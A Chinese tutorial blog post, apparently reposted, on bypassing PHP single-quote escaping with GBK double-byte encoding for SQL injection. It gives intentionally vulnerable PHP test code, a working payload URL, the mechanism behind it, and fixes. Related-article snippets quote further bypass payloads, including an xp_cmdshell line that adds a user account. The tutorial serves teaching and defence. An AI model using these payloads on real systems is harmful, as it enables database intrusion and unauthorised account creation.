php单引号绕过,SQL注入绕过PHP单引号字符转义原理及预防方法

最新推荐文章于 2024-07-16 17:43:15 发布
最新推荐文章于 2024-07-16 17:43:15 发布
阅读量882 收藏 1
点赞数
文章标签: php单引号绕过

http://mo47.com/blog/2011/sql_injection_gpc

利用GBK双字节编码,绕过单引号转义

附赠工具一款:PHP汉字url编码转换器

PHP测试代码如下

/* 注入实验:start */

$id = $_GET['id'];

//建立连接

$conn = false;

$conn = mysql_connect("localhost","root","");

mysql_query("set names 'gbk'");

mysql_select_db("test", $conn);

//执行

$sql = "SELECT id,name FROM table WHERE id = '".$id."' LIMIT 1";

if(!($query = mysql_query($sql,$conn))){

echo mysql_error();

}

$result = array();

while($row = mysql_fetch_array($query,MYSQL_ASSOC)){

$result[] = $row;

}

echo '$id:'.$id."\n";

echo '$sql:'.$sql."\n";

print_r($result);

/* 注入实验:end */

常规注入

URL:http://localhost/a.php?id=10%20AND%201=2

SQL:

SELECT downid,name FROM x_downs WHERE projectid = '10 AND 1=2' LIMIT 1

其中由于projectid = ‘$id’被单引号括住了,1=2,1=1暂时失效了

绕过去吧

不过我们可以通过汉字双字节编码进行注入

URL:http://localhost/a.php?id=10%D6‘%20AND%201=2%23

SQL:

SELECT downid,name FROM x_downs WHERE projectid = '10謀' AND 1=2#' LIMIT 1

可以看到在‘前面加了个%D6后,引号被吃掉了

原理

php会针对URL编码进行decode

decode后,url参数为 ?id=10 0xD6 ‘ 0×20 AND 0×20 1=2 0×23

magic_quotes_gpc处理时会自动转义,即在‘前面加一个\

处理后url参数变成: ?id=10 0xD6 0x5c ‘ 0×20 AND 0×20 1=2 0×23

可以看到,在‘前面PHP会自动加一个0x5c(注:0x5c为\),也就是会自动转义成\’

由于汉字是双字节的,所以0xD6 0x5c被转为謀这个汉字,’之前的\就这样消失了

最后的%23为#,在sql中#是注释,所以后面的’就没用了

最终sql中projectid = ’10謀’在sql执行的时候,由于projectid为int类型字段,mysql会自动intval()处理一下 详情见这里

所以等效于

SELECT downid,name FROM x_downs WHERE projectid = 10 AND 1=2

达到我们成功注入的目的

解决方法

两种

1.对用户的输入信息严格检查和过滤

2.针对本方法,进行如下修改

(1)切勿在连接设置字符集时:set names ‘gbk’

(2)当有类似设置时character_set_connection=gbk, character_set_results=gbk, character_set_client=binary

将character_set_client必须设置为binary

注:主要作用是在传输数据时使用binary的形式,避免了由于php将0xd6和0x5c合成一个汉字的问题

许清尘
关注
绕过mysql转义字符_SQL注入:各种绕过检测的姿势
weixin_29466045的博客
01-19 2711
这一篇主要总结一下sqlilabs中advanced injection中的用到的各种绕过,也就是less21-less38。目录1)数据编码2)特殊字符、语法关键字过滤3)存储型注入4)特殊字符转义与宽字节注入5)防火墙保护与http参数污染数据编码这个是最简单的,就是在普通注入的基础上用响应的编码方式编码一下payload即可,比如sqlilabs上这两个靶站都是用的base64编码。特殊字符...
单引号 绕过 mysql_MySQL绕过小结
weixin_33214011的博客
02-05 1064
0x01 前言最近在网上搜集学习到关于 mysql 注入的操作,故做一个小总结。0x02 测试我的WafBypass之道 (SQL注入篇)这篇文章结尾部分提到的,把每个 SQL 关键字两侧可插入的点称之为”位“,类似下图:我要总结的这些操作,也是围着这五个位,下面开始。位置一(1)注释符/**/ %23 --+ /*!50000union*/id=2/**/union select 1,user...
SQL注入绕过 单引号 限制继续注入
01-02
包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: 代码如下: //www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ‘net user angel pass /add’;– 这往往给大家造成误解,认为只要变量过滤了’就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤’是不够的,在’被过滤的情况下我们照样玩,看下面语句: 代码如下: //www.jb51.net/show.asp?id=1;declare%
php 绕过单引号,PHP字符编码绕过漏洞总结
weixin_39588679的博客
03-10 513
CODE:SETCHARACTERSET‘GBK’例:mysql_query(“SETCHARACTERSET‘gbk'”,$c);问题是方法二在改变字符集时mysql_real_escape_string() 并不知道而使用默认字符集处理从而造成和addslashes() 一样的漏洞$c=mysql_connect(“localhost”,“user”,“pass”);mysql_...
ThinkPHP单引号转义绕过方法
最新发布
taobao2024api的博客
07-16 813
绕过单引号转义是 SQL 注入攻击中的一个常见技巧,要想防御此类攻击,需要注意在使用原生 SQL 时,一定要对特殊字符进行转义,同时需要注意使用转义的方式。因为 '\' 可以在 SQL 的语法中正常识别,所以使用 '\' 来进行转义是可行的。但是,需要注意的是,由于 '\' 本身在 PHP 中也是转义符,因此在 PHP 中需要使用双重转义符 '\\'' 来表示 '\'。因此使用双引号可以有效绕过单引号转义,但是需要注意的是,使用双引号可能会遇到转义的问题,例如:双引号本身就需要使用 '\' 进行转义
php 单引号绕过,利用UTF8字节编码能否绕过PHP单引号转义进行注入?
weixin_30914751的博客
03-13 698
利用GBK双字节编码可以绕过单引号转义进行注入,这在之前的文章中已经分析过了(《利用GBK双字节编码突破PHP单引号转义限制进行SQL注入》,http://www.redicecn.com/html/wangluoanquan/20101018/180.html)。今天来讨论一下是否能够利用UTF8字节编码绕过转义。先回顾一下GBK编码绕转义原理:GBK编码的字节范围是:首字节:0x81-0xF...
利用GBK双字节编码突破PHP单引号转义限制进行SQL注入
kendyhj9999的专栏
10-11 1332
php.ini中magic_quotes_gpc被设置为on时,提交的参数会被转义,例如,单引号会被转义成了'。一下子截断了字符型注入的路。 GBK双字节编码:一个汉字用两个字节表示,首字节对应0x81-0xFE,尾字节对应0x40-0xFE(除0x7F),刚好涵盖了对应的编码0x5C。 0xD5 0x5C 对应了汉字“誠”,于是 %d5%5c  经URL解码后为“誠”。
浅谈oracle中单引号转义
12-16
ORACLE 单引号转义: 在ORACLE中,单引号有两个作用:  ...第二个单引号被作为转义符,第三个单引号转义,可将sql写成这样更好理解:  select ' '' ' from dual; output:' // 2.连接符‘||’导
php下防止单引号,双引号在接受页面转义的设置方法
10-30
PHP编程中,单引号(')和双引号(")的转义问题时常困扰着开发者,尤其是在处理用户输入数据和在数据库中存储数据时。当页面不希望自动转义单引号和双引号时,我们可以采取一定的措施来防止这种转义行为。下面我...
双字节编码绕PHP单引号转义又一例: SQL UPDATE注入
MyDriverC
01-05 727
原理和《利用双字节编码突破PHP单引号转义限制进行SQL注入》 是一样的。 view plaincopy to clipboardprint?   // by redice 2010.10.21     // 连接mysql数据库   $conn=0;   $conn = mysql_connect("localhost","root","redice2009");  
PHP防止页面单引号转义,php 防止单引号,双引号在接受页面转义
weixin_35686386的博客
03-23 712
php 防止单引号,双引号在接受页面转义PHP页面中如果不希望出现以下情况:单引号转义为/'双引号被转义为/"那么可以进行如下设置以防止:方法一:在php.ini中设置:magic_quotes_gpc=Off方法二:$str=stripcslashes($str)时间: 2008-07-09在PHP中,字符串的定义可以使用英文单引号' ',也可以使用英文双引号" ". 但是必须使用同...
php绕过分号(;)和尖括号(<>)转义
逗比大师的博客
03-24 2357
实战中发现可写文件且内容可控,尝试写入phpinfo,发现分号(;)和尖括号(<>)被转义,如:尝试写入 <?php phpinfo();?> 实际得到: \<?php phpinfo()\;?\> 分析分号(;)和尖括号(<>)两处转义,其中第一个尖括号转义不属于php内部,不起到转义作用,只是一个普通文本,不需要处理,第二个尖括号可以不...
SQL注入绕过PHP单引号字符转义原理预防方法
热门推荐
MyDriverC
01-05 2万+
PHP测试代码如下 /* 注入实验:start */ $id = $_GET['id']; //建立连接 $conn = false; $conn = mysql_connect("localhost","root",""); mysql_query("set names 'gbk'"); mysql_select_db("test", $conn);  //执行 $sql
常见php函数绕过
huangyongkang666的博客
03-31 4338
PHP常见函数介绍 1. is_numeric() 函数 作用:检测变量是否为数字或数字字符串。 PHP 版本要求:PHP 4, PHP 5, PHP 7 is_numeric函数对于空字符%00,无论是%00放在前后都可以判断为非数值,而%20空格字符只能放在数值后 绕过: ?what=1' ?what=1, ?what=1%00 2.isset函数 **作用:**检测变量是否设置 格式:bool isset ( mixed var [, mixed var [, …]] ) 返回值: 若变量不存在则返
绕过PHP代码执行中的过滤限制详解
LYJ20010728的博客
06-02 2527
绕过PHP代码执行中的过滤限制详解代码执行函数字符串拼接绕过字符转义绕过多次传参绕过内置函数访问绕过异或绕过绕过URL编码取反绕过递增递减运算符绕过上传临时文件 代码执行函数 PHP中具有代码执行功能的函数 eval():最常见的代码执行函数,把字符串 code 作为PHP代码执行 eval ( string $code ) : mixed assert():检查一个断言是否为false assert()会检查指定的assertion并在结果为false时采取适当的行动,在PHP5或P
php双引号解析漏洞
qq_50854662的博客
09-30 443
1|0前言 在PHP语言中,单引号和双引号都可以表示一个字符串,但是对于双引号来说,可能会对引号内的内容进行二次解释,这就可能会出现安全问题。 条件:php版本>5.5 2|0正文 举个简单例子 <?php $a = 1; $b = 2; echo '$a$b';//输出结果为$a$b echo "$a$b";//输出结果为12 ?> 可以看到这两个输出的结果并不相同。 在双引号中倘若有${}出现,那么{}内的内容将被当做代码块来执行。 可以看到成功执行了phpinfo() .
php 拼接 单双引拼接,双字节编码绕PHP单引号转义又一例: SQL UPDATE注入
weixin_28999575的博客
03-11 262
原理和《利用双字节编码突破PHP单引号转义限制进行SQL注入》http://www.redicecn.com/view-256.html是一样的。// by redice 2010.10.21// 连接mysql数据库$conn=0;$conn = mysql_connect("localhost","root","redice2009");if (!$conn){die("不能打开数据库连接...
PHP特性之CTF中常见的PHP绕过
Welcome To Myon'Blog !
07-18 7077
一、关于md5()和sha1()的常见绕过 1、使用数组绕过 2、 使用特殊字符绕过 二、strcmp绕过 三、switch绕过 四、intval绕过
SQL注入如何绕过单引号
05-26
在 SQL 注入中,单引号通常用于将用户输入的字符串括起来,以便在 SQL 查询语句中使用。为了绕过单引号防护,攻击者可以使用以下技术: 1. 使用双引号代替单引号:有些数据库支持使用双引号代替单引号。例如,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值